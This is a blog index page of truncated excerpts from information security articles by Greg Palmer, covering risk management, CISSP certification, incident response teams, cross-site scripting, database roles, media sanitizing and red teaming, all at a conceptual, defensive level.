Risk management is essential to the success of every company

Risk management is essential to the success of every company In business, risk is the likelihood that a loss will occur if a threat exposes a vulnerability. An organization must take risks to thrive, but must also recognize that risk cannot be ignored. The key is to understand threats and vulnerabilities, and then mitigate the threat to vulnerabilities… Read More »

Greg Palmer

Certified Information Systems Security Professional (CISSP)

 ISC2 CISSP Certification Requirements ISC2 CISSP provides the following requirements and recommendations to earn and maintain  a Certified Information Systems Security Professional (CISSP) certification. Candidates must have a minimum of 5 years cumulative paid full-time work experience in two or more of the 8 domains of the (ISC)2 CISSP CBK. Candidates may receive a one year experience waiver… Read More »

Greg Palmer

Ethics Related to the Collection of Information. Who Benefits?

Ethics Related to the Collection of Information The following are ethics that must be addressed when information systems are designed, and how they relate to the Confidentiality, Integrity, Availability (CIA) security concept. The first concern related to ethics is; who benefits from the information collected? The applicable area of the CIA security triad is confidentiality. Information collected for… Read More »

Greg Palmer

Information Security Publication Comparison

Information Security Publication Comparison Chart comparing major sections of the USPS Handbook AS-805 – Information Security to NIST Special Publications; 800-12, 800-14, 800-18, 800-26, and 800-30. Handbook AS-805 – Information Security (USPS, 2015) NIST Special Publications Introduction: Corporate Information Security Generally Accepted System Security Principles (NIST SP 800-14) Security Roles and Responsibilities System Security Plan Responsibilities (NIST SP… Read More »

Greg Palmer

Information System Incident Response & IRT’s

Information System Incident Response Effective information system Incident response requires proper planning and good management. Since organizations are diverse and vary in size, organizations must design their incident response plans based on a detailed assessment of their information system and business requirements. Constructing a proficient Incident Response Team (IRT) is a critical component of any effective Incident Response Plan.… Read More »

Greg Palmer

Computer Incident Response Teams & Incident Response Policy

  Incident Response Teams Computer Incident Response Teams (CIRTs or IRTs) are key components in information security incident response. Effective incident response doesn’t just happen; it takes careful planning and practice. An effective Incident Response Policy should have a plan documenting steps that must be followed and should contain key tasks or milestones with details, processes, and procedures,… Read More »

Greg Palmer

Cross-Site Scripting (XSS) Attacks

Cross-Site Scripting (XSS) These attacks can occur when data enters a Web application through an untrusted source, or data is included in dynamic content that is sent to a web user without being validated for malicious content. Malicious content can be JavaScript, but may also be HTML, Flash, or any other type of code that the browser can… Read More »

Greg Palmer

Roles in Database Security

Roles in Database Security Separation of duties state that no user should be given enough privileges to misuse a system on their own. Roles establish separation of duties by breaking down user privilege to job duty requirements. A Role is a group of individual privileges that correlate to a users job responsibilities. Example, a role is created named… Read More »

Greg Palmer

Guidelines for Media and Data Sanitizing

Guidelines for Media and Data Sanitizing When information systems are taken offline and retired, great care must be taken to ensure media that stored the data in the system remains protected through the retirement process. If media used is going to be removed and discarded, or re-purposed, organizations must ensure data that was stored on the media is… Read More »

Greg Palmer

Developing an Effective Red Team, the Right Mind Set

Developing an Effective Red Team Penetration testing (pen-testing) is characterized as a method of evaluating internal and external technical security controls through a methodically planned simulated attack that imitates threats from malicious outsiders and malicious insiders to understand the security weaknesses in a system and/or network. When properly executed, pen-testing is a critical tool in assessing and improving … Read More »

Greg Palmer